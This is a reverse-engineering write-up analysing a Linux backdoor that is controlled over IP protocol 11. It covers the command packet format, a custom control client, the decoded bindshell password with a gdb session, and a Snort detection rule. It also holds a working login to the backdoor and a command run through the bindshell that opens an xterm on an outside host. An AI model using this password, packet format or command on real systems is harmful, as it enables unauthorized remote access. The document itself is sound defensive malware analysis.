The Reverse Engineers Compiler
REC was used to decompile the-binary to C like structured code, which eased the identification of the program structure.
Can be used to regenerate the symbol table of a stripped ELF binary, and do a lot of other reverse engineering tasks.
User Mode Linux
A reasonably safe environment for running and tracing the-binary.
To monitor network traffic to and from the-binary, and analyse the DDOS functions.
To generate packets to send to the-binary to verify functionality.
To capture response packets from the-binary.
A rule for the Snort Network Intrusion Detection System (NIDS) was created to detect control traffic for this binary, and others like it.
The-binary was disassembled with objdump and REC under a standard RedHat Linux 7.1 install. C source was developed on the host using the libnet and libpcap libraries, in order to excercise the functionality of the-binary. User Mode Linux was installed to provide an environment for executing the-binary.
The-binary was tested under User Mode Linux (UML) using a virtual network consisting of addresses in the range 192.168.32.0/24. The infected host was configured at 192.168.32.200, with the client probing from the real host and tcpdump running on the real host. The-binary was largely disassembled before the first test run, to provide some assurance that it would not detect UML and attempt to exploit it to escape to the host OS, or perform other malicious actions. The initial disassembly was also required to determine the packet contents the-binary was expecting.
The drive images used under User Mode Linux where the standard User Mode Linux Debian Minimal and RedHat 7.2 full install drive images where used to provide virtual systems for running and communicating with the-binary.
The host machine on which UML was run did not have any other active network interfaces, to prevent packets slipping out onto public networks.
This environment was designed to prevent network activity from the infected host from escaping beyond the host running the UML system.
Having downloaded the-binary.tar.gz from project.honeynet.org, I verified the MD5 checksum of the archive with the md5sum command, and it matched that shown on the web site.
The Unix file(1) command was used to identify the binary as a statically linked Linux i386 executable. strings(1) was used to examine the-binary for clues as to its purpose and composition. strings revealed that the-binary was probably linked against "The Linux C library 5.3.12", containing "yplib.c,v 2.6 1994/05/27". This library was present in RedHat Linux 6.2, but not RedHat Linux 6.1 or 7.0, so if this program was linked under RedHat, it was probably under RedHat 6.2. Also present are strings indicating that /bin/csh may be used to execute commands, and that /tmp/.hj237349 may be used at some point.
I ran "objdump -dS the-binary" to get a raw disassembly of the-binary for reference when REC did not produce the level of detail required.
I ran REC against the-binary to try to start finding functions and structure.
Initial disassembly with the Reverse Engineers Compiler, REC, revealed a lot of functions containing the "int 0x80" interrupt instruction. This interrupt is used by programs running under Linux to invoke kernel functions, called System Calls, with a command number in EAX.
There is a list of Linux system calls in usr/include/asm/unistd.h. To determine the likely purpose of the functions in the REC output, I created a Perl script that would search for lines of REC output where EAX was set, followed by an int 0x80, and mark the interrupt with the system call name out of unistd. This script is convert-syscall.pl in files.tar.
Once I had determined the names of some of the library functions within
the REC output, I added them to my REC command file. The argument lists
for these commands came from their C header files in /usr/include/. At
this point, my REC command file looked something like this:
#!wrec file: the-binary cpu: i386 option: +hexconst region: 0x000090 0x01f5d0 0x08048090 text region: 0x01f5d8 0x024228 0x080675d8 data region: 0x024228 0x0302ac 0x0806d228 data ############################## # Standard library functions # ############################## symbol: 0x0804F620, 0x0804F67F T fopen(char *path, char *mode) # INCOMPLETE TYPE symbol: 0x0804F808, 0x0804F81F T sprintf(char *string, char *format) # INCOMPLETE TYPE symbol: 0x0804F820, 0x0804F884 T _IO_sprintf(char *string, char *format) symbol: 0x08055FBC, 0x0805602B T _exit(int n) symbol: 0x080569FC, 0x08056A2B T wait4(unsigned int pid, int *status, int options, void *rusage) symbol: 0x08056A2C, 0x08056A71 T accept(int s, void *address, unsigned int *addrlen) symbol: 0x08056A74, 0x08056AB9 T bind(int sockfd, void *myaddr, unsigned int *addrlen) symbol: 0x08056ABC, 0x08056B01 T connect(int sockfd, void *serveraddr, unsigned int addrlen) ...
To aid in identifying and verifying further library functions, I downloaded the glibc 5.3.12 source and referred to it when I found a prospective library function.
Had I known of it, I could have avoided this time intensive process by running dress(1) from the Fenris reverse engineering toolkit. Dress can regenerate a stripped symbol table of an ELF executable.
To find main() in the-binary, I examined the output of REC and found the ELF entry point function, labelled "__entry_point__". Reading through this standard function revealed a call to a larger function at 0x08048134, which I assumed to be main().
In main(), the lead up to the first for loop contains calls to
various functions and can be represented by the summary below:
I was interested in the encoding and decoding functions mentioned in the challenge questions. decode() was quickly found by examining the function calls following the call to recv() in main(). I looked here because you cannot do much with a command packet before decoding it. encode() was found by searching for the value 0x17 (a key value in the decode() function) in the rest of the disassembly.
The encode and decode functions are loaded into the following
0x0804A194-0x0804A1E6: encode(int length, unsigned char *src, unsigned char *dst)
0x0804A1E8-0x0804A2A4: decode(int length, unsigned char *src, unsigned char *dst)
their disassembly with REC was not to hard to follow, and is included in the files I have submitted.
Examining the functions called by the goto statement shortly after the call to decode() revealed that some of them executed shell commands, command 1 returned the PID of any children that the server had forked and command 2 configured the server. The code before the goto revealed the format and usage of the first 4 bytes of the packet.
Now that I knew that the-binary was a network daemon, and what some of its commands did, I ran the-binary under User Mode Linux. User Mode Linux is a Linux kernel that runs under Linux, allowing you to use a file on the host system as a disk drive containing the filesystem for UML.
When run under User Mode Linux, the-binary changes its process name, as visible in ps, to "[mingetty]". This is the name of a terminal program commonly found running on Unix machines, so this is an attempt to obscure the-binary in the process list. The "top" command still shows the original binary name ("the-binary") and /proc shows the-binary has a single open socket.
the-binary uses IP protocol 11 for communication. This
evades simple searches for evidence of a compromise, such as
TCP and UDP network scans by nmap, and basic interpretation of
netstat output. IP services listening for protocol 11 are shown
in the output of "netstat -an" as:
raw 0 0 0.0.0.0:11 0.0.0.0:* 7
A list of supported protocols on a machine can be found by the
nmap (http://www.insecure.org/nmap/) protocol scan, however this
could be fooled by having the back door send an ICMP protocol
unreachable packet in response to malformed command packets.
Nmap -sO outputs the following line when it detects protocol 11:
11 open nvp-ii
Using libnet and libpcap, I put together a tool to construct command packets for the-binary based on the packet format I worked out from the REC disassembly, and another to dump the packets. By throwing these packets at the-binary and observing it with gdb, I was able to work out almost all of the functionality it provides. These two tools are called pingit.c and dumpit.c, and are included in the attached archive. Running tcpdump in another window allowed me to see the DOS floods when they started.
I rewrote pingit.c to accept parameters from the command line. This new program is called the-client, and it allows control of most aspects of packets being sent to the-binary. the-client.c is also included in the attached files. It does not support a couple of the flood request types, and does not properly receive response packets yet.
Using the REC disassembly, and my tools; dumpit, pingit and the-client, I was able to determine the packet format for all 12 commands and responses.
All command and response packets have a standard IP packet header, which specifies protocol 11. The first word of the data area is an unencoded command/response flag. The rest of the data area is encoded using the encode() function detailed elsewhere in this analysis. The first byte is ignored, and can be used to salt the encode() function so that repeated commands have 255 different possible appearances on the wire. The next byte is the command byte, a number between 1 and 12 that specifies the function being called. The rest of the packet is data for the command.
0x00 0x14 0x16 +-----------+-----+-----+-----+-----+----... | IP Header | XXX | DIR | SLT | CMD | ARGS +-----------+-----+-----+-----+-----+----... offset 0 IP Header 0x14 XXX Unknown 0x15 DIR Direction: 02 Command 03 Reponse 04 Reponse Continuation ------ Everything after here encoded ------------- 0x16 SLT Salt 0x17 CMD Command number 0x18... ARGS Variable length parameters for CMD Example packet and response: command 1: status Accepts no parameters 0x00 0x14 0x16 +-----------+----+----+----+----+----... | IP Header | 00 | 02 | XX | 01 | +-----------+----+----+----+----+----... offset 0x17 CMD Command number = 1 Returns PID of currently executing shell or flood process. 0x00 0x14 0x16 +-----------+----+----+----+----+-----+------+-... | IP Header | 00 | 02 | XX | 01 | CHL | PID | +-----------+----+----+----+----+-----+------+-... offset 0x17 CMD Command number = 1 0x18 CHL Flag to indicate if there is a child running 00 = no child process 01 = child process 0x19,0x1A PID Process ID of child process
The rest of the packet formats can be seen in the-client.c and pingit.c
Examining the REC disassembly of the bindshell function (CMD_06) reveals that a connection is accepted, the string sent by the client is compared with the value 'TfOjG', and if the strings match the remote user is dropped into a shell.
I used the-client to launch the bindshell, and checked the protocol and port
on the host running the-binary with netstat -an. I saw a new port had been
tcp 0 0 0.0.0.0:23281 0.0.0.0:* LISTEN
As it is TCP, we can use telnet to connect. I connected, and tried the password 'TfOjG', but got no response. Looking at the code, newline characters (0x0a and 0x0d in hex) are translated to '\0', so I tried a few newlines after the password with no luck. Re-examining the disassembly revealed that the password was obfuscated, and that each submitted character was incremented by one before checking. I reconnected and tried the password 'SeNiF' followed by spaces with no luck. I decided to use gdb, to compare the strings myself as the-binary saw them.
The disassembly shows that the code forks twice in CMD_06, once after the function is entered so that the main loop can continue processing other commands, and once after accept is called. This could have made interactive disassembly with gdb difficult, as I had already noticed that follow-fork-mode was ineffective, possibly because the-binary was statically linked. Luckily, just after the second fork recv() is called.
As recv() blocks until it receives input, I connected to the bindshell with telnet. This got the bindshell thread upto the recv() command. Using ps I found the process ID of the forked shell, and fired up gdb.
bash-2.05# ps ax | fgrep mingetty 417 tts/0 S 0:00 /sbin/mingetty serial/0 454 ? S 0:00 [mingetty] 507 ? S 0:00 [mingetty] 508 ? S 0:00 [mingetty] (gdb) attach 508 Attaching to process 508 0x08056b74 in ?? () (gdb) bt #0 0x08056b74 in ?? () #1 0x080489cf in ?? () #2 0x080480eb in ?? () (gdb) disassemble 0x080489cf 0x08048a1b Dump of assembler code from 0x80489cf to 0x8048a1b: 0x80489cf: xor %ebx,%ebx 0x80489d1: add $0x10,%esp 0x80489d4: mov 0xffffbc44(%ebx,%ebp,1),%al 0x80489db: cmp $0xa,%al 0x80489dd: je 0x80489e3 0x80489df: cmp $0xd,%al 0x80489e1: jne 0x80489f0 0x80489e3: movb $0x0,0xffffbc44(%ebx,%ebp,1) 0x80489eb: jmp 0x80489fe 0x80489ed: lea 0x0(%esi),%esi 0x80489f0: mov %al,0xffffbc44(%ebx,%ebp,1) 0x80489f7: incb 0xffffbc44(%ebx,%ebp,1) 0x80489fe: inc %ebx 0x80489ff: cmp $0x12,%ebx 0x8048a02: jle 0x80489d4 0x8048a04: lea 0xffffbc44(%ebp),%esi 0x8048a0a: mov $0x8067617,%edi 0x8048a0f: mov $0x6,%ecx 0x8048a14: cld 0x8048a15: test $0x0,%al 0x8048a17: repz cmpsb %es:(%edi),%ds:(%esi) 0x8048a19: je 0x8048a44 End of assembler dump. (gdb) break *0x8048a0f Breakpoint 1 at 0x8048a0f (gdb) cont Continuing.
Typing 'SeNiF' into telnet followed by a few spaces causes the breakpoint to be reached, and I compare the password from the network to the password in the binary:
Breakpoint 1, 0x08048a0f in ?? () (gdb) x/10c 0xffffbc44+$ebp 0x9fffb7e8: 84 'T' 102 'f' 79 'O' 106 'j' 71 'G' 33 '!' 33 '!' 33 '!' 0x9fffb7f0: 33 '!' 33 '!' (gdb) x/10c 0x8067617 0x8067617: 84 'T' 102 'f' 79 'O' 106 'j' 71 'G' 0 '\000' -1 'ÿ' -5 'û' 0x806761f: 1 '\001' 0 '\000'
So the password is correct. The problem appears to be that 6 characters are compared, and the password is 5 characters, so I needed a trailing null byte. As newlines are translated to null bytes, all I needed to do was press Enter after typing the password. I restarted the bindshell with the-client, and reconnected with telnet and typed SeNiF followed by Enter. This worked, because then when I pressed Enter a second time I got the response ": command not found".
[[email protected] reverse]$ sudo ./the-client -i tap0 -s 192.168.32.1 -d 192.168.32.200 stop Cmd: 8 Resp?: 0 Bind?: 0 Proto: 11 Body: 400 Wait: 500 Device: tap0 ttl: 250 Unk: 0 Source: 192.168.32.1 Dest: 192.168.32.200 [[email protected] reverse]$ sudo ./the-client -i tap0 -s 192.168.32.1 -d 192.168.32.200 bindshell Cmd: 6 Resp?: 0 Bind?: 1 Proto: 11 Body: 400 Wait: 500 Device: tap0 ttl: 250 Unk: 0 Source: 192.168.32.1 Dest: 192.168.32.200 STUB: no bindshell support yet [[email protected] reverse]$ telnet 192.168.32.200 23281 Trying 192.168.32.200... Connected to 192.168.32.200. Escape character is '^]'. SeNiF : command not found ls : command not found echo hi hi
As it turns out, the shell is pretty useless because it cannot find any non builtin commands. This can be overcome (if you don't possibly mind giving away your IP address to the owner of the compromised system) by setting xhost on an x-server to allow access from the compromised host and starting an x-term to display on the x-server, eg:
[[email protected] reverse]$ telnet 192.168.32.200 23281 Trying 192.168.32.200... Connected to 192.168.32.200. Escape character is '^]'. SeNiF echo `/usr/X11R6/bin/xterm -display 192.168.32.254:0`
this exploits the builtin command echo, and the `` quotes that can be used to run a command using the bindshell.
As the-binary is controlled by packets using an unusual protocol, I decided that this was a good way to detect the network traffic related to this program and others like it. Since Snort (an Open Source network intrusion detection system) has an easy to use rule system for configuring its alerts, I decided to prototype this with Snort.
Snort is configured using rule files. The rule files list rules that can specify which packets and data flows to match, and what to tell the Snort user about those packets.
At first glance, I could not find any way to specify how to monitor for
particular IP protocols in the Snort documentation. A bit of research
uncovered the ip_proto keyword. I created and tested the rule:
alert ip $EXTERNAL_NET any <> $HOME_NET 0 (msg:"Traffic on unusual IP protocol" ; ip_proto: !6; ip_proto: !17; ip_proto: !1; classtype:misc-activity; rev:1;)which detected the traffic. I tried adding more protocols to the exclusion list, but Snort started detecting all traffic so I left it at that. The greater than (>) operator does not seem to work with ip_proto, and it does not seem to be able to handle lists. In a production environment you would need to ignore 5 or so major protocols (TCP, UDP, ICMP, IGRP, various routing protocols such as OSPF) to cut down on false positives. Protocol numbers are assigned by IANA and available at http://www.iana.org/assignments/protocol-numbers
The-binary is a back door program. It acts as a network server, listening on IP protocol 11. Command and response packets are encoded using a simple cipher.
It provides facilities to execute shell commands using /bin/csh and /bin/sh as root on the compromised system, and the ability to launch a variety of Denial of Service (DOS) attacks.